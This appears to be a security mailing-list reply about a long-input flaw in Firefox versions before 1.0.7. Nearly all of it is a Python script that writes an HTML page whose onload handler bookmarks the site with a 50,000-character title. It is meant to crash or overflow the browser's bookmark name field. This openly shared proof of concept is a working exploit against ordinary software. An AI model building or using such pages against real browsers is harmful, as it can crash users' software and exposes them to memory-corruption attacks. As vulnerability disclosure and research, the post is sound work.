Hello Sumit,<br><br>I saw this for some time ago too and I far as I know the below code would do the same,<br>with the versions below 1.0.7. As I remember were all input fields&nbsp; &quot;vulnerable&quot;. I have <br>choosen the bookmark &quot;name&quot; field, which will popup after loading with a long buffer.
<br><br>html = open(&quot;firefox.html&quot;, &quot;w&quot;)<br>buff = 'A' * 50000<br>html.write(&quot;&lt;html&gt;&lt;head&gt;\n&quot;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &quot;&lt;script type=\&quot;text/javascript\&quot;&gt;\n&quot;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &quot;function bookmarksite(title, url){\n&quot;
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &quot;if (document.all)\n&quot;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &quot;window.external.AddFavorite(url, title);\n&quot;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &quot;else if (window.sidebar)\n&quot;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &quot;window.sidebar.addPanel(title, url, \&quot;\&quot;)}\n&quot;
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &quot;&lt;/script&gt;&lt;/head&gt;\n&quot;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &quot;&lt;body onload=\&quot;javascript:bookmarksit<div id="mb_2">e('&quot;+buff+&quot;', '<a>http://www.mozilla.org')\&quot;
</a>&gt;\n&quot;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &quot;&lt;/body&gt;&lt;/html&gt;&quot;)<br>html.close()<br><br>Regards,<br><br>Casiamo</div>